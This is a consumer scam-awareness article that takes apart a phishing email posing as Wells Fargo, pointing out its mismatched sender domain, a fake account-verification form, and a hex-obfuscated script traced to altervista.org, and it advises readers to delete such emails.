Anatomy of a Phish
One of our visitors at TheDailyScam.com recently forwarded an email to us that appeared to be from Wells Fargo bank. However, the sender felt that the email was very suspicious. The email came with an attached file named “Case ID-40431.html.” The email, and attached html file were a very clever and extremely dangerous phishing scam. A phishing scam is a scam in which a fake website has been set up to appear like a real website for a financial institution or some other service such as Apple account. The scammer hopes to trick the email recipient into entering very personal information such as bank account or Apple ID login information.
In this article, we’ll take this particular scam apart and expose it in layers starting with the simplest parts and ending with the more complex ones. Our hope is that everyone reading this article will gain some insite into these types of scams and avoid becoming a victim themselves.
Let’s start with the email that arrived from Wells Fargo:
The woman who received this email does have a Wells Fargo bank account but was suspicious because the sender’s email address contained conflicting information. Though the sender is identified as “Wells Fargo,” the email came from a domain named “surveillancesystem.com.” And what’s up with that firstname.lastname@example.org? It also made our recipient suspicious. If you enter “surveillancesystem.com” into Google, you’ll learn that Google can find no such domain name. (Not to be confused with surveillancesystemS.com) Even if the domain surveillancesystem.com DID exist, it has nothing to do with Wellsfargo Bank!
What we found was a very long web page filled with more than a hundred legitimate links to Wells Fargo bank. However, in the bottom third of the web page was a request to provide the necessary information to complete the “verification process” and unrestrict our restricted bank account. This is what the scammers wanted from us…
What makes this a bit unusual is that someone took the effort to write this in hexadecimal code instead of plain readable characters (called ASCI characters) as if they wanted to hide the intention of this script. We copied the hexadecimal code and pasted it into an online decoder and learned something very important and revealing. [Decoder: http://meyerweb.com/eric/tools/dencoder/]
We entered the domain, “altervista.org” into a Google search field to see what Google might tell us and we weren’t the least bit surprised to see many Google returns referring to this domain as a known phishing site.
Clean-MX.com even had a long list of identified phishing attacks listed as coming from various subdomains of the website Altervista.org. (The subdomain is the name that appears in front of “altervista.org” and separated by a period.)
Like we said at the beginning of this article… this was a very, very dangerous phishing email. This kind of phishing trick can cost someone everything he or she has in bank accounts, including identity theft and a ruined credit history.
Just delete. Safe surfing!